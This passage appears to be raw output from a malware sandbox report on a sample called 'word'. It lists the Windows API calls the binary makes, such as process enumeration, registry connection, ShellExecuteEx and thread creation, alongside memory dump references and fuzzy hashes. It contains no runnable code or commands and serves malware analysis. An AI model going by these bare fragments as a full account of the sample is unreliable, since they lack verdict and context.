                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                            • String ID:
                                                                            • API String ID: 87235514-0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                            • String ID:
                                                                            • API String ID: 87235514-0
                                                                            • Opcode ID: de9aba9e896a2e755c79cba499ec14fd455f1b60db9a9f79a8626ad1a28ad6a0
                                                                            • Instruction ID: 4493abccadab05ae7d00f733e1fa63583af0c494729619d74f1516a50adc8d80
                                                                            • Opcode Fuzzy Hash: de9aba9e896a2e755c79cba499ec14fd455f1b60db9a9f79a8626ad1a28ad6a0
                                                                            • Instruction Fuzzy Hash: A951E4F05097D139F7369364884ABA7BFE46F8A304F088A4EF1D5065C2D2ACE984C769
                                                                            APIs
                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AA77
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ConnectRegistry_wcslen
                                                                            • String ID: HH
                                                                            • API String ID: 535477410-2761332787
                                                                            • Opcode ID: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
                                                                            • Instruction ID: 7b41397762752e7dec08e47bcdb2cb2f58790b6f4670524580eb9da3090621e6
                                                                            • Opcode Fuzzy Hash: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
                                                                            • Instruction Fuzzy Hash: A2516D71208301AFD304EF65C981F5BB7A9BFC4704F40892EF685A7291D678E905CB6B
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00457C34
                                                                            • _memset.LIBCMT ref: 00457CE8
                                                                            • ShellExecuteExW.SHELL32(?), ref: 00457D34
                                                                              • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                              • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                            • CloseHandle.KERNEL32(?), ref: 00457DDD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: _memset$CloseExecuteHandleShell_wcscpy_wcslen
                                                                            • String ID: <$@
                                                                            • API String ID: 1325244542-1426351568
                                                                            • Opcode ID: 669f3797eafbd6ea24f738bceaf78c3ad3f6bdf3b3f8ec2a74c9f7251b65f49f
                                                                            • Instruction ID: 09e461bdfc47c8bdd671eddb31188d347eda7c51057725e13e77015b5001baed
                                                                            • Opcode Fuzzy Hash: 669f3797eafbd6ea24f738bceaf78c3ad3f6bdf3b3f8ec2a74c9f7251b65f49f
                                                                            • Instruction Fuzzy Hash: EA510FB55083009FC710EF61D985A5BB7E4AF84709F00492EFD44AB392DB39ED48CB9A
                                                                            APIs
                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 0047379B
                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 004737A8
                                                                            • __wsplitpath.LIBCMT ref: 004737E1
                                                                              • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                            • _wcscat.LIBCMT ref: 004737F6
                                                                            • __wcsicoll.LIBCMT ref: 00473818
                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 00473844
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00473852
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                            • String ID:
                                                                            • API String ID: 2547909840-0
                                                                            • Opcode ID: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
                                                                            • Instruction ID: 8efa427203ffd7a45d167e3a64f6abf3f3640219bb0751621114887cb14f0fc1
                                                                            • Opcode Fuzzy Hash: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
                                                                            • Instruction Fuzzy Hash: 4751BB71544304A7D720EF61CC86FDBB3E8AF84748F00492EF58957182E775E645C7AA
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 004552B7
                                                                            • ImageList_Remove.COMCTL32(?,?,?,?), ref: 004552EB
                                                                            • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004553D3
                                                                            • DeleteObject.GDI32(?), ref: 0045564E
                                                                            • DeleteObject.GDI32(?), ref: 0045565C
                                                                            • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                            • DestroyWindow.USER32 ref: 00455678
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                            • String ID:
                                                                            • API String ID: 2354583917-0
                                                                            • Opcode ID: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
                                                                            • Instruction ID: 19c5dc8500d05a42ca126c51664c70dafe1d1a8ca3b523478e8997b137d6e309
                                                                            • Opcode Fuzzy Hash: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
                                                                            • Instruction Fuzzy Hash: 77519D30204A419FC714DF24C4A4B7A77E5FB49301F4486AEFD9ACB392DB78A849CB54
                                                                            APIs
                                                                              • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                            • GetMenu.USER32(?,?,?,00000001,?,?,?,?), ref: 004776AA
                                                                            • GetMenuItemCount.USER32(00000000), ref: 004776CC
                                                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 004776FB
                                                                            • _wcslen.LIBCMT ref: 0047771A
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$CountItemStringWindow_wcslen
                                                                            • String ID:
                                                                            • API String ID: 1823500076-0
                                                                            • Opcode ID: 3c1e0179b5075f45df12b398ec391808b8d2f1e7a16a5d1bec5683dd9427006f
                                                                            • Instruction ID: 4b9e656becebfc5f52f27a1d7ad2c07a58398098864d75d3a5ce1c02cc274359
                                                                            • Opcode Fuzzy Hash: 3c1e0179b5075f45df12b398ec391808b8d2f1e7a16a5d1bec5683dd9427006f
                                                                            • Instruction Fuzzy Hash: 174117715083019FD320EF25CC45BABB3E8BF88314F10492EF55997252D7B8E9458BA9
                                                                            APIs
                                                                            • InterlockedIncrement.KERNEL32 ref: 0047247C
                                                                            • InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472491
                                                                            • Sleep.KERNEL32(0000000A), ref: 00472499
                                                                            • InterlockedIncrement.KERNEL32(004A7CAC), ref: 004724A4
                                                                            • InterlockedDecrement.KERNEL32(004A7CAC,?,?,?,?), ref: 00472599
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Interlocked$DecrementIncrement$Sleep
                                                                            • String ID: 0vH
                                                                            • API String ID: 327565842-3662162768
                                                                            • Opcode ID: bfb173672284e31ba0a3017bb0c7d670cf276827bd066f711b3c3b49063f60eb
                                                                            • Instruction ID: 7246262c18bb701d5349304b0e2d21290bf7c9637501dd5a114e6955e8e78370
                                                                            • Opcode Fuzzy Hash: bfb173672284e31ba0a3017bb0c7d670cf276827bd066f711b3c3b49063f60eb
                                                                            • Instruction Fuzzy Hash: 9631D2329082259BD710DF28DD41A8A77A5EB95324F05483EFD08FB251DB78EC498BED
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448B16
                                                                            • GetFocus.USER32(?,00000401,?,00000000), ref: 00448B1C
                                                                            • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                            • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                            • ShowWindow.USER32(004A83D8,00000000), ref: 00448C37
                                                                            • ShowWindow.USER32(004A83D8,00000004), ref: 00448C43
                                                                            • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Enable$Show$FocusMessageSend
                                                                            • String ID:
                                                                            • API String ID: 3429747543-0
                                                                            • Opcode ID: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
                                                                            • Instruction ID: 96ed947056310062a3fa6d2350adc65d304252fdbf70c479ab88671ed4e09c2c
                                                                            • Opcode Fuzzy Hash: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
                                                                            • Instruction Fuzzy Hash: FC31B4706443819BF7248E14C8C4BAFB7D0EB95745F04492EF981A6291DBA89845C719
                                                                            APIs
                                                                            • GetClientRect.USER32(?,?,004A83D8,?), ref: 00447997
                                                                            • GetCursorPos.USER32(?), ref: 004479A2
                                                                            • ScreenToClient.USER32(?,?), ref: 004479BE
                                                                            • WindowFromPoint.USER32 ref: 004479FF
                                                                            • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447A78
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                            • String ID: X+
                                                                            • API String ID: 1822080540-1938338529
                                                                            • Opcode ID: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
                                                                            • Instruction ID: e9c1e18ea4fcc9a2ad4b32cd349e8b57ec7287094a91df3c43d19f1875151664
                                                                            • Opcode Fuzzy Hash: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
                                                                            • Instruction Fuzzy Hash: DE3188742082029BD710CF19D88596FB7A9EBC8714F144A1EF88097291D778EA57CBAA
                                                                            APIs
                                                                            • GetCursorPos.USER32(?), ref: 004478A7
                                                                            • TrackPopupMenuEx.USER32 ref: 004478C3
                                                                            • DefDlgProcW.USER32(?,0000007B,?,?,004A83D8,?,004A83D8,?), ref: 004478E7
                                                                            • GetCursorPos.USER32(?), ref: 00447935
                                                                            • TrackPopupMenuEx.USER32 ref: 0044795B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CursorMenuPopupTrack$Proc
                                                                            • String ID: X+
                                                                            • API String ID: 1300944170-1938338529
                                                                            • Opcode ID: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
                                                                            • Instruction ID: 600148c7f6f0e64f7aba5c2d0a58757112576a5c49d56a392ea253be37485a5b
                                                                            • Opcode Fuzzy Hash: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
                                                                            • Instruction Fuzzy Hash: 2B31E475244204ABE214DB48DC48FABB7A5FBC9711F14491EF64483390D7B96C4BC779
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D32F
                                                                            • GetVolumeInformationW.KERNEL32 ref: 0045D3B3
                                                                            • __swprintf.LIBCMT ref: 0045D3CC
                                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D416
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$InformationVolume__swprintf
                                                                            • String ID: %lu$HH
                                                                            • API String ID: 3164766367-3924996404
                                                                            • Opcode ID: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
                                                                            • Instruction ID: e4de0c6df68350460ad5232616e5185c9d799459bd1b640414cfcbd8d86849a8
                                                                            • Opcode Fuzzy Hash: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
                                                                            • Instruction Fuzzy Hash: 85314A716083019BC310EF55D941A5BB7E4FF88704F40892EFA4597292D774EA09CB9A
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450E24
                                                                            • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450E35
                                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450E43
                                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450E54
                                                                            • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450E62
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: Msctls_Progress32
                                                                            • API String ID: 3850602802-3636473452
                                                                            • Opcode ID: 42656bfbb5a190feb894f1e63281698c22ff60bbec02a0e57f9bf8616b6fd2a5
                                                                            • Instruction ID: b51c377fab27852337593a8f268aff884918310fa347e0537580fa9f3b853d23
                                                                            • Opcode Fuzzy Hash: 42656bfbb5a190feb894f1e63281698c22ff60bbec02a0e57f9bf8616b6fd2a5
                                                                            • Instruction Fuzzy Hash: 2C2121712543007AE7209A65DC42F5BB3E9AFD8B24F214A0EF754B72D1C6B4F8418B58
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                                            • String ID:
                                                                            • API String ID: 3985565216-0
                                                                            • Opcode ID: dc022e11ae60a508d3fee16e2099accab07c71a042b18f60c16d9d094d7ead98
                                                                            • Instruction ID: 02eb1b45cc7e926b76574f27881fb1e8d9d372094f4d7b34cf8607babd6cb63d
                                                                            • Opcode Fuzzy Hash: dc022e11ae60a508d3fee16e2099accab07c71a042b18f60c16d9d094d7ead98
                                                                            • Instruction Fuzzy Hash: EA213270200A019FCB20DF65CAD4B2A77A9BF45312F50855EED45CB352DB39EC45CB69
                                                                            APIs
                                                                            • ___set_flsgetvalue.LIBCMT ref: 00415737
                                                                            • __calloc_crt.LIBCMT ref: 00415743
                                                                            • __getptd.LIBCMT ref: 00415750
                                                                            • CreateThread.KERNEL32(00000000,?,0041568B,00000000,00000004,00000000), ref: 00415776
                                                                            • ResumeThread.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00415786
                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 00415791
                                                                            • __dosmaperr.LIBCMT ref: 004157A9
                                                                              • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                              • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                                                                            • String ID:
                                                                            • API String ID: 1269668773-0
                                                                            • Opcode ID: 67dce5b71fba5b2bc579f619b30886b4133a6035229b30961222ec1983ea5d94
                                                                            • Instruction ID: 083f1b3d72dc2b4e3073d7627409da2efaae6cca9fbdfa2eb2c15b7cb2a145f7
                                                                            • Opcode Fuzzy Hash: 67dce5b71fba5b2bc579f619b30886b4133a6035229b30961222ec1983ea5d94
                                                                            • Instruction Fuzzy Hash: 4511E672501604EFC720AF76DC868DF7BA4EF80334F21412FF525922D1DB788981966D
                                                                            APIs
                                                                              • Part of subcall function 00438FE4: GetProcessHeap.KERNEL32(00000008,0000000C,0043910A,00000000,00000000,00000000,0044646E,?,?,?), ref: 00438FE8
                                                                              • Part of subcall function 00438FE4: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FEF
                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,0044646E,?,?,?), ref: 00439119
                                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439123
                                                                            • DuplicateHandle.KERNEL32 ref: 0043912C
                                                                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00439138
                                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439142
                                                                            • DuplicateHandle.KERNEL32 ref: 00439145
                                                                            • CreateThread.KERNEL32(00000000,00000000,004390C2,00000000,00000000,00000000), ref: 0043915E
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                            • String ID:
                                                                            • API String ID: 1957940570-0
                                                                            • Opcode ID: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
                                                                            • Instruction ID: b388a4287fabc35bf2088fa38ebc9459a42e34e8a642192e1b63b89709cb9be3
                                                                            • Opcode Fuzzy Hash: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
                                                                            • Instruction Fuzzy Hash: 3BF0CD753413007BD220EB65DC86F5BB7A8EBC9B10F118919F6049B1D1C6B4A800CB65
                                                                            APIs
                                                                            • ___set_flsgetvalue.LIBCMT ref: 00415690
                                                                              • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                              • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                              • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                            • ___fls_getvalue@4.LIBCMT ref: 0041569B
                                                                              • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                            • ___fls_setvalue@8.LIBCMT ref: 004156AD
                                                                              • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
                                                                            • ExitThread.KERNEL32 ref: 004156BD
                                                                            • __freefls@4.LIBCMT ref: 004156D9
                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 004156EC
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
